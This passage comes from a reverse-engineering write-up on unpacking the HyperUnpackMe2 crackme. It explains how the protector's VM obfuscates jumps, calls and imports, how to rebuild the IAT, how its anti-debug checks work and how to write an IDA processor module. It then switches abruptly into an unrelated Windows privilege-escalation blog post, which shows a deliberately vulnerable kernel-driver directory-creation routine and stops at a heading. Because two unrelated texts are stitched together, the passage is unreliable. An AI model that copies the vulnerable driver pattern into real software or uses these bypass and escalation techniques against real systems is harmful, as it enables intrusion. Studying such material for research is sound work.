Here we see, in the x86 IDB, an example of the jmp obfuscation. What actually happens here, at runtime, is that a chunk of memory is allocated, and gets filled with what looks like API thunk functions. The jmps in the binary are patched to jmp into the allocated memory, which subsequently jmps to the correct location in the binary. The following VM code illustrates this:

    ROM:0104840F    valloc  195h, 6       ; allocate 0x195 bytes of vmem under the
    ROM:01048418    getmem  r0E, 6        ; tag 0x6
                    
    ROM:0104841E    mov     r0F, 10019DFh ; see above:  same address
    ROM:01048426    mov     r0D, r0F
    ROM:0104842A    add     r0D, 5        ; point after the jump
    ROM:01048432    mov     r09, r0E      ; point at the currently-assembling stub
    ROM:01048436    sub     r09, r0D      ; calculate the displacement for the jmp
    ROM:0104843A    inc     r0F           ; point to the 0 dword in e9 00000000
    ROM:0104843D    mov     [r0F], r09    ; insert reference to allocated memory
    ROM:01048441    mov     r0B, 1001AE1h ; this is the target of the jmp
    ROM:01048449    mov     r0C, r0E
    ROM:0104844D    add     r0C, 5        ; calculate address after allocated jmp
    ROM:01048455    sub     r0B, r0C      ; calculate displacement for jmp
    ROM:01048459    mov     [r0Eb], 0E9h  ; build jmp in VirtualAlloc'ed memory
    ROM:0104845E    inc     r0E
    ROM:01048461    mov     [r0E], r0B    ; insert address into jmp
    ROM:01048465    add     r0E, 4

This is the general code sequence used to fix up the jumps when the function to be fixed up remains in the original binary’s sections. When the function has been copied into memory, as described in the previous section, the code changes slightly: r0F and r0B’s addresses are the displacements described previously. For example, the code at -41E and -441 are replaced with these snippets, respectively:

    ROM:010498F3    getmem  r0F, 10000h
    ROM:010498F9    mov     r0F, [r0F]
    ROM:010498FD    add     r0F, 469h
    
    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h

Given the sequences above, and making use of the stolen address -> real address mapping, it’s trivial to cut out the middleman and insert the proper displacements into the correct dword locations. In the code above, we retrieve the dword operands from -41E and -441 and simply fix the jumps ourselves.

 4.3 Calls-To Obfuscation

These are handled in a very similar fashion as the jump obfuscation: the code to fix up the calls-to references is exactly the same as the jump obfuscation fixups. The calls also go through stubs in allocated memory which jmp to their proper destinations.

    .text:01001C51 6A 00             push    0
    .text:01001C53 E8 00 00 00 00    call    $+5
    .text:01001C58 C2 1C 00          retn    1Ch
    
    ROM:0104419A    valloc  3F2h, 5       ; allocate 0x3f2 bytes of memory under
    ROM:010441A3    getmem  r0E, 5        ; the tag 0x5
    
    ROM:010441A9    mov     r0F, 1001C53h ; address of call to be fixed up (above)
    ROM:010441B1    mov     r0D, r0F
    ROM:010441B5    add     r0D, 5        ; point after the call
    ROM:010441BD    mov     r09, r0E      ; r09 points to the allocated jmp stub
    ROM:010441C1    sub     r09, r0D
    ROM:010441C5    inc     r0F
    ROM:010441C8    mov     [r0F], r09    ; insert the proper displacement
    ROM:010441CC    mov     r0B, 1001B9Ah ; we would be calling this address
    ROM:010441D4    mov     r0C, r0E
    ROM:010441D8    add     r0C, 5
    ROM:010441E0    sub     r0B, r0C      ; calculate displacement
    ROM:010441E4    mov     [r0Eb], 0E9h  ; form the long jmp in allocated memory
    ROM:010441E9    inc     r0E
    ROM:010441EC    mov     [r0E], r0B
    ROM:010441F0    add     r0E, 4

Notice that, in this case, a call from a non-stolen function is being fixed up to call a non-stolen function: the addresses on lines -1A9 and -1CC are hard-coded within the binary. When a call in a stolen function is fixed up to call another function, the beginning of the above code sequence is different: it uses the getmem idiom, as we saw previously. The code at -1A9 becomes:

    ROM:010441F8    getmem  r0F, 10000h
    ROM:010441FE    mov     r0F, [r0F]
    ROM:01044202    add     r0F, 20Dh

However, the destination address is not loaded via getmem, because as we saw previously, calls to stolen functions are routed to their destinations via these jumps. I.e. calls to stolen functions behave just like calls to the original functions.

Recovering the proper displacement from the caller to the callee is as simple as it was for the jumps, because the code is identical, so see the closing remarks for the last section on how to fix up these calls.

 4.4 Import Obfuscation

Here’s a sample of the import redirection. Instead of referencing the imports directly, the jmp/call-to-import instructions are patched to reference locations such as these:

    TheHyper:01021524    pushf
    TheHyper:01021525    pusha
    TheHyper:01021526    call    sub_1021548
    
    TheHyper:01021548    pop     eax
    TheHyper:01021549    add     eax, 16h
    TheHyper:0102154C    jmp     eax

This sort of thing goes on for a while (six layers for this one) with some random junked garbage interspersed before eventually redirecting control to the original import:

    TheHyper:010215DE 61                popa
    TheHyper:010215DF 9D                popf
    TheHyper:010215E0 E9 00 00 00 00    jmp     $+5

4.4.1 IAT Reconstruction

Believe it or not, the first thing that HyperUnpackMe2 does when it really gets down to business is to correctly rebuild the original IAT.

First, the DLL names are retrieved from memory byte-by-byte. The names are not stored contiguously, but rather, the bytes corresponding to the DLL names are randomly mixed together. The DLL is then LoadLibraryA’d.

    ROM:01026058    mov     r04, 1013000h  ; point to beginning of packer section
    ROM:0102607B    getmem  r05, dword_101382D
    ROM:01026081    mov     r0B, r09
    ROM:01026085    mov     r06, r04
    ROM:01026089    add     r06, 41Ch
    ROM:01026091    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x101341c
    ROM:01026095    inc     r0B
    ROM:01026098    mov     r06, r04
    ROM:0102609C    add     r06, 93h
    ROM:010260A4    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x1013093
    
    ; idiom repeats a variable number of times
    
    ROM:010260A8    inc     r0B
    ROM:0102617C    mov     [r0Bb], 0
    ROM:01026181    push    r09
    ROM:01026184    x86call r0C                 ; LoadLibraryA
    ROM:01026186    add     rESP, 4

Next, the entire DLL’s address space is copied into a freshly-allocated chunk of memory. Yes, you read that right. The DLL’s SizeOfImage is used as the size parameter to VirtualAlloc, and then the entire DLL is memcpy’d into it the result. This is responsible for a huge bloat in the memory footprint. I didn’t think that this trick would work, but the crackme does run, after all. Personal correspondence with TheHyper reveals that this is why the crackme only runs on XP SP2 (although I haven’t investigated why — help me out here, Alex?).

The following code illustrates the process:

    ROM:0102618E    push    r09
    ROM:01026191    push    r0B
    ROM:01026194    push    r0D
    ROM:01026197    mov     r09, r0A
    ROM:0102619B    getmem  r0A, g_Copy_Of_Kernel32_Address_Space
    ROM:010261A1    mov     r0A, [r0A]
    ROM:010261A5    push    kernel32_hashes_VirtualAlloc
    ROM:010261AB    push    r0A
    ROM:010261AE    vmcall  API__GetProcAddress
    ROM:010261B4    mov     r0D, r0A
    ROM:010261B8    mov     r0B, r09
    ROM:010261BC    add     r0B, 3Ch
    ROM:010261C4    mov     r0B, [r0B]
    ROM:010261C8    add     r0B, r09
    ROM:010261CC    add     r0B, 50h
    ROM:010261D4    mov     r0B, [r0B]          ; retrieve this DLL's SizeOfImage
    ROM:010261D8    push    40h
    ROM:010261DE    push    1000h
    ROM:010261E4    push    r0B
    ROM:010261E7    push    0
    ROM:010261ED    x86call r0D                 ; allocate that much memory
    ROM:010261EF    add     rESP, 10h
    ROM:010261F7    mov     r03, r0A
    ROM:010261FB    mov     [r05], r0A
    ROM:010261FF    push    r0B
    ROM:01026202    push    r09
    ROM:01026205    push    r0A
    ROM:01026208    x86call x86_memcpy          ; copy DLL's address space
    ROM:0102620E    add     rESP, 0Ch
    ROM:01026216    pop     r0D
    ROM:01026219    pop     r0B
    ROM:0102621C    pop     r09

Next, the imported APIs are loaded, but not in the normal way. The protector includes a VM-function that I’ve called API__GetProcAddress, which takes a pseudo-HMODULE and a shellcode-like API hash as arguments. The pseudo-HMODULE is the address of the memory that the DLL was copied into above. Thus, the addresses returned by this function reside in the copied DLL bodies, and not the originals.

API__GetProcAddress works by iterating through the DLL’s exports and hashing each function’s name, stopping when it finds the corresponding hash that was passed in as an argument. It then returns the address of that function.

This makes it harder for dynamic tools to identify which APIs are actually being used: after all, the API addresses are not contained within a loaded module.

The hashes and their locations in the original IAT are retrieved from the jumble of data at the beginning of the packer section in a similar fashion as the assembling of the DLL names. Additionally, the address at which the resolved import belongs in the original IAT entries is also assembled from scattered data.

    ROM:0102621F    xor     r07, r07    ; r07 = hash
    ROM:01026223    mov     r06, r04
    ROM:01026227    add     r06, 12h
    ROM:0102622F    mov     r05, [r06]
    ROM:01026233    and     r05, 0FFh
    ROM:0102623B    or      r07, r05    ; get a single byte of the hash
    ROM:0102623F    ror     r07, 8
    
    ; idiom repeats three times
    
    ROM:010262B3    xor     r08, r08    ; r08 = where to put the resolved import
    ROM:010262B7    mov     r06, r04
    ROM:010262BB    add     r06, 5C7h
    ROM:010262C3    mov     r05, [r06]
    ROM:010262C7    and     r05, 0FFh
    ROM:010262CF    or      r08, r05
    ROM:010262D3    ror     r08, 8
    
    ; idiom repeats three times
    
    ROM:01026347    push    r07
    ROM:0102634A    push    r03         ; point at copied DLL
    ROM:0102634D    vmcall  API__GetProcAddress
    ROM:01026353    add     r08, 1000000h
    ROM:0102635B    mov     [r08], r0A  ; store resolved address back into IAT

The DLL names, hashes, and IAT addresses can all be recovered with no difficulties, and we can ignore the DLLs being copied into dynamically allocated memory. It’s a simple matter to reverse the hashes into API names. Therefore, the entirety of the import information can be reconstructed statically: we can simply mimic what the packer itself does, rebuild the IDTs/IATs with no difficulties, and then point the imports directory pointer in the PE header to our rebuilt structures.

I was anticipating things would be harder than they turned out to be, so I decided to move the FirstThunk lists (into which the original import references were made) instead of keeping them at their original addresses. This turned out to be an unnecessary mistake that complicates some of what follows. I apologize.

In order to rectify this situation, I kept a map from the old IAT addresses into the new IATs that I created.

For example:

    .text:010012A0    __imp__PageSetupDlgW@4 dd 0

    010012A0 -> [Address of new FirstThunk entry for PageSetupDlgW import]

4.4.2 IAT Redirection

The next thing that happens is that the addresses which were resolved in the previous section are inserted into API-obfuscating stubs described in 4.4, and the addresses of these API-obfuscating stub functions are inserted into the IAT atop the import addresses.

    .text:010012A0    ; BOOL __stdcall PageSetupDlgW(LPPAGESETUPDLGW)
    .text:010012A0    __imp__PageSetupDlgW@4 dd 0
    
    TheHyper:01014126    pushf              
    TheHyper:01014127    pusha              
    TheHyper:01014128    call    sub_1014150 ; eventually ends up at next snippet
                                                                           
    TheHyper:0101423A    popa                       
    TheHyper:0101423B    popf                       
    TheHyper:0101423C    jmp     near ptr 0B97002DDh ; patch here + 1 byte
    
    ROM:0103659A    mov     r0B, 10012A0h ; see above:  IAT addr
    ROM:010365A2    mov     r0E, 1014126h ; see above:  beginning of import obfs
    ROM:010365AA    mov     r08, 101423Dh ; see above:  end of import obfs
    ROM:010365B2    mov     r06, [r0B]
    ROM:010365B6    mov     [r0B], r0E    ; replace IAT addr with obfuscated addr
    ROM:010365BA    mov     r03, r08
    ROM:010365BE    dec     r03
    ROM:010365C1    add     r03, 5
    ROM:010365C9    sub     r06, r03
    ROM:010365CD    mov     [r08], r06    ; form relative jump to real import

This makes no difference to the static examiner, and does not require fixups.

4.4.3 Call Instruction Fixup

Next, the CALL instructions which reference the IAT are re-created as relatively-addressed instructions which reference the API-obfuscating stub functions. The instructions in the original binary were 0xFF 0x15 [direct address], the pre-fixup instructions are 0xCC 0x90 0x90 0x90 0x90 0x90, and the new instructions are 0xE8 [relative address] 0x90. As this operation requires one less byte than the original directly-addressed references, a NOP is needed for the remaining byte cavity.

    .text:010019D4    int     3    ; Trap to Debugger
    .text:010019D5    nop
    .text:010019D6    nop
    .text:010019D7    nop
    .text:010019D8    nop
    .text:010019D9    nop
    
    ROM:0103C747    mov     r03, 10019D4h ; address of the snippet above
    ROM:0103C74F    mov     r06, r03
    ROM:0103C753    add     r06, 5        ; point after call
    ROM:0103C75B    mov     [r03b], 0E8h  ; insert relative call
    ROM:0103C760    inc     r03
    ROM:0103C763    mov     r04, 100121Ch ; where we call to
    ROM:0103C76B    sub     r04, r06      ; create relative displacement
    ROM:0103C76F    mov     [r03], r04    ; insert relative address
    ROM:0103C773    add     r03, 4
    ROM:0103C77B    mov     [r03b], 90h   ; insert NOP in empty byte spot

As before, the idiom is slightly different for fixing the calls in stolen functions, in that r03 is fetched from memory instead of referenced directly. The code at -747 would become, for instance:

    ROM:0103C67E    getmem  r03, 10000h
    ROM:0103C684    mov     r03, [r03]
    ROM:0103C688    add     r03, 1318h

In order to fix these up, we retrieve the address of the call from -747, and the import destination from -763. We then manually insert the correct instruction which calls into this IAT slot. Actually, due to my previously-described mistake, we first run the IAT address through the old IAT slot -> new IAT slot map before fixing the instruction.

4.4.4 Mov Instruction Fixup

Next, instructions of the form mov reg32, [dword from IAT] are fixed up by the protector in the same fashion as in the previous section. They are relatively addressed to point directly to the obfuscated stubs (whose addresses are fetched out of the IAT), instead of the direct addressing that was present in the original binary. The registers involved in this process are ESI, EDI, EBP, EBX, and EAX.

Stop and think for a second. So far, we’ve made the assumption that all imports are functions, but this is not always true. The MSVC CRT contains references to two imported data items. Trying to run a data import through the import-obfuscating procedure is an incorrect transformation and will always result in a crash. This is an Achilles’ heel of this protection.

The mov-instruction fixup is accomplished in much the same way as the call-instruction fixups. There are several idioms: for stolen functions, for regular functions, for EAX versus the other registers (as the instruction for EAX is five bytes, while the others are six bytes). The EAX-references are assumed to point to data and are fixed up directly instead of relatively.

Once again, extracting this information from the code sequences is not difficult to do statically, and I think I’m starting to develop RSI so I’ll skip the details here.

4.4.5 IAT Zeroing

After all of the references are correctly fixed up, the import addresses in the IAT are no longer needed, and are zeroed. We can ignore this step.

 4.5 The Rest of the Protection

As is usual in unpacking tasks, we must set the original entrypoint field of the PE header to the real entrypoint. We scan the disassembly listing for the instruction ‘stop’ and then statically backtrace to find the value of r0A.

    ROM:01049F05    mov     r0A, 1006AE0h
    ROM:01049F0D    stop

Finally, the NumberOfRVAsAndSizes field of the PE header has been set to -1 in order to confuse OllyDbg, so we should set that back to 0x10, the default. And while we’re at it, reduce the raw and virtual sizes of the last section, reduce the SizeOfImage, and truncate the last section in the executable. The final executable is exactly 1kb larger than the copy of notepad.exe which ships with Windows XP SP2.

After making all of the above modifications, the binary runs properly. Success!

 5.0 Comments On The Protection

It took a lot of work to unpack this protector, but ultimately, the static solution was both obvious and straightforward. On the other hand, dynamic dumping of this protector would be difficult, although still feasible.

 5.1 Problems With The Protection

This protection has a few problems in the theoretical sense. For one, it requires disassembling the binary: considering that the IAT is zeroed, _every_ reference to the IAT must be accounted for; if not, the program will simply crash. For example, if a trivial packer which XORed the code section, but left the imports alone, was applied first, all references would be missed and the binary would have no hope of running. This could be assuaged by not zeroing the original IAT (but still applying fixups on those which can be found) so that any non-found references continue to work properly.

Another problem is, of course, that disassembly isn’t perfect, and you could end up with all sorts of bugs if you just blindly replace what you think is a reference to the IAT if it is instead just plain old data, for instance.

Another problem is functions which have merged tails. If a function with a shared exit path is stolen, there are going to be problems.

Another problem, discussed in a previous section, is the assumption that imports will always point to functions and not data. This a faulty assumption, and will cause many failures.

All of that being said, if one assumes perfect disassembly (which is possible manually via IDA and/or full debugging information) and allows a blacklist of imports which are data, then this is a working protection, one which I expect will be quite potent after a few generations. By no means is this a «fire and forget» packer like UPX, but it can be made to work on a case-by-case basis.

 Appendix A: Anti-Debugging Tricks

There are 53 anti-debug mechanisms and checks in the VM, 49 of which can be broken automatically with either a tiny IDC script patching the bytecode directly, or a small patch to the VM harness. Of the remaining four, there are two which I’ve never heard of before (although I don’t do this type of work often), so it’s worth checking it out in the IDB, but I won’t ruin the surprises here. I didn’t look too heavily into those which could be broken automatically, so some of those descriptions in the IDB may be incorrect.

You may notice conditional jump instructions in the IDB which don’t have their jump targets resolved, such as the following:

    ROM:01035E90    cmp     r07, 1
    ROM:01035E98    jz      77026DDFh

At first I figured my processor module was buggy, and that this instruction was supposed to transfer control to a keyed memory region which the processor module had failed to locate. After inspection of the raw bytecode and a close look at the relevant VM harness code, in fact, this instruction will move the VM EIP to the immediate value 0x77026DDF, which will cause a reading access violation or undefined behavior during the next VM cycle, depending upon whether that’s a valid address. Hence, jumps with unresolved targets are anti-debugging tricks. TheHyper confirmed this afterwards in private correspondence.

 Appendix B: IDA Processor Module Construction

The main difference between writing a simple disassembler and writing an IDA processor module is that, instead of printing the disassembly immediately and moving on to the next instruction, information about each individual instruction and operand must be retained for later analysis and display.

For example, according to this VM’s instruction encoding, 0x20 0x?[0-0xf] means «get flags into specified register». Whereas in a trivial disassembler one might write this:

    case 0x20:
        printf("%lx:  getefl %s\n", address, decode_register(next_byte & 0xf));
        return 2; // size of instruction

In an IDA processor module, one must write something like this (in ana.cpp):

    case 0x20:
        cmd.itype    = TH_getefl; // instruction code is TH_getefl; this comes
                                  // from an enumeration
        cmd.Op1.type = o_reg;     // operand 1 is register
        cmd.Op1.reg  = TH_Regnum(4, ua_next_byte() & 0xf); // get register num
        cmd.Op1.dtyp = dt_dword;  // register is dword size
        cmd.Op2.type = o_void;    // operands 2+ do not exist
        length = 2;               // instruction size is 2
        break;

TH_getefl is an element of an enum (ins.hpp), which in turn has a text representation and flags (ins.cpp). The operand information is eventually retrieved and printed (out.cpp):

    case o_reg:
        OutReg( x.reg );
        break;

Clearly, writing an IDA processor module is a significant amount of work compared to writing a simple disassembler, and in the case of small portions of straight-line VM code, the latter approach (via IDC) is preferable. However, in the case of large amounts of VM code with non-trivial control flow structure, the traditional advantages of IDA (cross-reference tracking, comment-ability, ability to name locations, creation and application of structures, and the ability to run scripts and existing plugins) really begin to shine.

 B.1 Logical and Physical Divisions of an IDA Processor Module

It should be noted that, as with all C++ source code, physical divisions are irrelevant as long as all references can be resolved at link-time; however, the layout presented herein is consistent with the processor modules released in the IDA SDK, and also with the included processor module. Coincidentally, this information is laid out in the same order as specified by Ilfak in %idasdk%\readme.txt:

    "  Usually I write a new processor module in the following way:
            - copy the sample module files to a new directory
            - first I edit INS.CPP and INS.HPP files
            - write the analyser ana.cpp
            - then outputter
            - and emulator (you can start with an almost empty emulator)
            - and describe the processor & assembler, write the notify() function"

It should also be noted that I have written only one processor module and am not an expert on the subject. This information presented is correct as far as I am aware, but should not be considered authoritative. When in doubt, consult the processor module sources in the IDA SDK, inquire on the DataRescue forums, ask Ilfak, and buy the SDK support plan as a last resort.

 B.2 Assigning Each Mnemonic a Numeric Code and Textual Representation

The files herein are solely responsible for defining the opcodes used by the processor, their mnemonics specifically, in both numeric and textual forms.

B.2.1 Ins.hpp

This file contains an enum, called «nameNum» by Ilfak, which assigns each opcode to a number. This enum contains a special, unused leading entry ([processor]_null, set to zero), and a trailing entry ([processor]_last) denoting the beginning and the end of the enum.

    enum nameNum 
    {
      TH_null = 0,    // Unknown Operation
      TH_mov,         // Move                
      [...,]          // [more instructions here]
      TH_stop,        // Stop execution, return to x86
      TH_end          // No more instructions
    };

B.2.2 Ins.cpp

This file is the counterpart to the corresponding header file, which contains an array of instruc_t structures, which consist of a const char * (the mnemonic’s textual description) and a flags dword. The entries in this array correspond numerically to the values given in the enum. The flags specify the number of operands the instruction uses/changes, whether the instruction is a call/switch jump, and whether to continue disassembling after this instruction is encountered (e.g. return instructions and unconditional jumps do not generally transmit control flow to the following instruction).

    instruc_t Instructions[] = {
      { "",                     0             },  // Unknown Operation
      
      // GROUP 1:  Two-Operand Arithmetic Instructions
      { "mov" ,   CF_USE2 | CF_USE1 | CF_CHG1 },  // Move
      [{...,...},]                                // [more instructions]
      { "stop"   ,                    CF_STOP }   // Stop execution, return to x86
    
    };

 

 B.3 Assigning Each Register a Numeric Code and Textual Representation

B.3.1 Reg.hpp

This file contains an enum, whose real entries begin at 0 (unlike previously- described enums with a bogus leading entry), consisting of the legal registers supported by the processor. As IDA takes into account the concept of segmentation, you will need to define fake code and data segment registers if your processor does not use them.

    enum TH_regs
    {
        rESPb = 0,
        rESPw,
        rESP,
        [...,]
        r0F,
        rVcs, // fake registers for segmentation
        rVds, // fake
        rEND
    };

B.3.2 [Processor].hpp This file contains an array of const char *s which map the elements of the enum described in the previous subsection to a textual representation thereof.

    static char *TH_regnames[] =
    {
        "rESPb",
        "rESPw",
        "rESP",
        [...,]
        "r0F"
    };

 

 B.4 Analyzing an Instruction And Filling IDA’s «cmd» Structure

The main disassembler function in an IDA processor module is called int ana() and lives in ana.cpp. This function takes no parameters, and instead retrieves the relevant bytes to decode via the functions ua_next_byte(), _word(), and _long().

This function, or collection of functions as the case may be, is responsible for:

  • Setting cmd.itype to the correct value from the nameNum enum described in section B.2.1.
  • Setting the fields of cmd.Op[1-6] to describe the types of operands (registers, immediates, addresses, etc.) used by this instruction.
  • Returning the length of the instruction.

An example from the included processor module:

    case 0x1d:
        cmd.itype     = TH_vfree;       // virtualalloc'ed memory free 
        cmd.Op1.type  = o_imm;          // type of operand 1 is immediate
        cmd.Op1.value = ua_next_long(); // value = memory key to free
        cmd.Op1.dtyp  = dt_dword;       // 4-byte memory key
        length = 5;                     // 5 bytes, 1 for opcode, 4 for operand
        break;

The cmd structure ties together the functions described in the next two sections: these functions do not take arguments, and instead retrieve information from the cmd structure in order to perform their duties.

 B.5 Displaying Operands

Out.cpp is responsible for providing two functions, bool outop( op_t & ) and void out(). out() is responsible for outputting the mnemonic and deciding whether to output the operands.

There’s a bit of subtlety here: processors which use conditional execution, for example ARM and the instruction MOVEH, may have a single nameNum/Instructions entry for an opcode («MOV»), and the logic for prepending «-EH» to the mnemonic exists in out(). I have not encountered this while coding a processor module and cannot speak about it.

One thing to notice about the code below is how gl_comm is set to 1 every time out() is called. If you do not do this, you will not see comments in the disassembly. Figuring this required an email to Ilfak. Frankly, it’s puzzling why displaying comments is not the default behavior, but this is the reality, so be sure to set this variable.

    void out( void )
    {
        char buf[MAXSTR];
        init_output_buffer(buf, sizeof(buf));
        OutMnem();
        
        if( cmd.Op1.type != o_void )
            out_one_operand( 0 );    // output first operand
        
        if( cmd.Op2.type != o_void ) // do we have a second operand?
        {
            out_symbol( ',' );       // put a ", " in the output
            OutChar( ' ' );
            out_one_operand( 1 );    // output second operand
        }
        
        term_output_buffer();
    
        // attach a possible user-defined comment to this instruction
        gl_comm = 1;
                                              
        MakeLine( buf );
    }

The other function, bool outop(op_t &), is responsible for translating the contents of the op_t structure it is given into a textual description of that operand. The structure of this function is a simple switch statement on the op_t.type field. This function should be written concurrently with ana().

The output takes place through a number of functions exported from ua.hpp in the SDK: these functions tend to begin with «Out» or «out_» (out_register, OutValue, out_keyword, out_symbol, etc).

All in all, coding this function is mainly trivial. Here’s one of the more complicated operand types from the included processor module:

    case o_displ:
        out_symbol('[');
        OutReg( x.phrase );
        out_symbol('+');
        OutValue(x, OOF_ADDR );
        out_symbol(']');
        break;

 

 B.6 Creating Cross-References

Most, but not all, instructions implicitly transfer control flow to the next instruction, and create no other cross-references. Some instructions like «ret» and «jmp» do not reference the next instruction. Other instructions, like «call» and conditional jumps, create additional references to the address(es) targeted. Still other instructions create references to data variables specified by immediate values.

This knowledge is not inherent in the depiction of the instruction set which has been developed thus far, and must be specified programatically. This is the responsibility of the int emu() function, which resides in emu.cpp, the smallest .cpp file in the supplied processor module.

    int emu( void )
    {
      ulong Feature = cmd.get_canon_feature();
    
      if((Feature & CF_STOP) == 0) // does this instruction pass flow on?
          ua_add_cref( 0, cmd.ea+cmd.size, fl_F ); // yes -- add a regular flow
    
      if(Feature & CF_USE1) // does this instruction have a first operand?
          TouchArg(cmd.Op1, 0); // process it 
    
      if(Feature & CF_USE2)
          TouchArg(cmd.Op2, 1);
    
      return 1; // return value seems to be unimportant
    }
    
    // "emulation" performed on a given op_t, see emu()
    static void TouchArg( op_t &x, bool bRead )
    {
        switch( x.type )
        {
        case o_vmmem:
            ua_add_cref( 0, get_keyed_address(x.addr), 
                         InstrIsSet(cmd.itype, CF_CALL) ? fl_CN : fl_JN);
            // add a code reference to the targeted address, either a call or a 
            // jump depending on whether that instruc_t's flags has CF_CALL set.
            break;
        }
    }

 

 B.7 Declaring IDA’s Relevant Processor Module Structures

The bulk of what remains is the creation of structures which are directly or indirectly exported by the processor module.

B.7.1 asm_t Structure

This structure defines an «assembler» which determines what the disassembly listing should look like. Specifically, what the syntax is for declaring data, origins, section boundaries, comments, strings, etc.

Since we don’t need to re-assemble virtual machine code (in the case of VMs found in protectors), the choices made here are immaterial, and this structure can be created once and re-used for all VM processor modules.

B.7.2 Function Begin and End Sequences

Both of these are optional. IDA employs both a linear-sweep and a flow-following method of disassembly: on the first pass, it marks all entrypoints as code, and then scans the raw bytes looking for the function begin sequences (such as push ebp / mov ebp, esp). These sequences can be specified in the processor module; however, when dealing with a throwaway VM, they aren’t so important, because you’re unlikely to know a priori what a function prologue looks like.

B.7.3 Processor Notification Event Handler

This is where my ignorance of processor module construction is most transparent. This function is called by the kernel upon certain events being triggered; such events include closing the database, opening an existing IDB, creating a new IDB, changing the processor module type, creating a new segment, and so on. A complete list of events can be found in idp.hpp.

For the creation of this processor module, I did not need to utilize many processor events, so I did not explore this further.

B.7.4 processor_t Structure

This is the «main» structure employed by the processor module, as plugin_t is the main structure employed by a plugin. In this structure, the pieces gathered in the previous sections are stitched together.

The processor module must know:

  • The numeric ID of the processor module (custom-defined).
  • The long and short name of the processor module. I.e. metapc and pc respectively. There’s an important point here which isn’t documented: the makefile has a line called «DESCRIPTION» which MUST be in the format «[long name]:[short name]». Failure to ensure this means that the processor module will not be shown in the list of valid processor modules. Without knowing this, you’ll be mailing Ilfak for advice, like I did.
  • The assembler(s) available. We’ll only need the one we defined in B.7.1.
  • A function pointer to int ana() (see B.4).
  • A function pointer to int emu() (see B.6).
  • A function pointer to void out() and bool outop(op_t &) (see B.5).
  • A function pointer to int notify(processor_t::idp_notify, …) (see B.7.3).
  • The number of registers, and a pointer to the const char * array of register names (both laid out in B.3).
  • The function begin and end sequences described in B.7.2. We can set these to NULL.
  • The number of mnemonics, and a pointer to the instruc_t array of mnemonic names (both laid out in B.2).

 

 Appendix C: Obligatory Greets

TheHyper: Very innovative, good work! You keep making them, I’ll keep breaking them.

blorght and Zen: Two of my favorite people, with or without the charming accents. Way too talented and more than a step or two over the edge. Stay just the way you are: I love both of you.

Nicholas Brulez: My bro the PE killer 🙂 I hope we get to meet up again soon. I don’t have to tell you to keep kicking ass, mate.

Neural Noise: One of my best friends, and a very gracious host. I can’t wait to meet up again in the world’s most alluring mafia-run slum that is Napoli (what a crazy city!). You bring the beautiful women, and I’ll bring my bummy self, and we can have panic attacks in traffic waititng for the party to start ;-). Stay cool, man! 🙂

Solar Eclipse: Congrats on the Pietrek thing!

spoonm: Thanks for the crash space and the informed conversation, and I’m looking forward to see what you publish next, too.

Pedram: For being the modern-day Fravia of OpenRCE and editing this tripe.

Rossi: For the much-needed proofreading.

lin0xx: Calm down!

LeetNet, kw, and upb: Self-explanatory.

Skape: For uninformed and for rocking.

Finally, to all true friends everywhere: I couldn’t do it without you.

Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read

For the past couple of months I’ve been presenting my “Introduction to Windows Logical Privilege Escalation Workshop” at a few conferences. The restriction of a 2 hour slot fails to do the topic justice and some interesting tips and tricks I would like to present have to be cut out. So as the likelihood of a full training course any time soon is pretty low, I thought I’d put together an irregular series of blog posts which detail small, self contained exploitation tricks which you can put to use if you find similar security vulnerabilities in Windows.

 

In this post I’m going to give a technique to go from an arbitrary directory creation vulnerability to arbitrary file read. Arbitrary direction creation vulnerabilities do exist — for example, here’s one that was in the Linux subsystem — but it’s not always obvious how you’d exploit such a bug in contrast to arbitrary file creation where a DLL is dropped somewhere. You could abuse DLL Redirection support where you create a directory calling program.exe.local to do DLL planting but that’s not always reliable as you’ll only be able to redirect DLLs not in the same directory (such as System32) and only ones which would normally go via Side-by-Side DLL loading.

 

For this blog we’ll use my example driver from the Workshop which already contains a vulnerable directory creation bug, and we’ll write a Powershell script to exploit it using my NtObjectManager module. The technique I’m going to describe isn’t a vulnerability, but it’s something you can use if you have a separate directory creation bug.

Quick Background on the Vulnerability Class

When dealing with files from the Win32 API you’ve got two functions, CreateFile and CreateDirectory. It would make sense that there’s a separation between the two operations. However at the Native API level there’s only ZwCreateFile, the way the kernel separates files and directories is by passing either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE to the CreateOptions parameter when calling ZwCreateFile. Why the system call is for creating a file and yet the flags are named as if Directories are the main file type I’ve no idea.

 

A very simple vulnerable example you might see in a kernel driver looks like the following:

 

NTSTATUS KernelCreateDirectory(PHANDLE Handle,

                              PUNICODE_STRING Path) {
 IO_STATUS_BLOCK io_status = { 0 };
 OBJECT_ATTRIBUTES obj_attr = { 0 };

 InitializeObjectAttributes(&obj_attr, Path,
    OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE);
 
 return ZwCreateFile(Handle, MAXIMUM_ALLOWED,

                     &obj_attr, &io_status,
                     NULL, FILE_ATTRIBUTE_NORMAL,

                    FILE_SHARE_READ | FILE_SHARE_DELETE,
                    FILE_OPEN_IF, FILE_DIRECTORY_FILE, NULL, 0);
}

 

There’s three important things to note about this code that determines whether it’s a vulnerable directory creation vulnerability. Firstly it’s passing FILE_DIRECTORY_FILE to CreateOptions which means it’s going to create a directory. Second it’s passing as the Disposition parameter FILE_OPEN_IF. This means the directory will be created if it doesn’t exist, or opened if it does. And thirdly, and perhaps most importantly, the driver is calling a Zw function, which means that the call to create the directory will default to running with kernel permissions which disables all access checks. The way to guard against this would be to pass the OBJ_FORCE_ACCESS_CHECK attribute flag in the OBJECT_ATTRIBUTES, however we can see with the flags passed to InitializeObjectAttributes the flag is not being set in this case.

 

Just from this snippet of code we don’t know where the destination path is coming from, it could be from the user or it could be fixed. As long as this code is running in the context of the current process (or is impersonating your user account) it doesn’t really matter. Why is running in the current user’s context so important? It ensures that when the directory is created the owner of that resource is the current user which means you can modify the Security Descriptor to give you full access to the directory. In many cases even this isn’t necessary as many of the system directories have a CREATOR OWNER access control entry which ensures that the owner gets full access immediately.

Creating an Arbitrary Directory

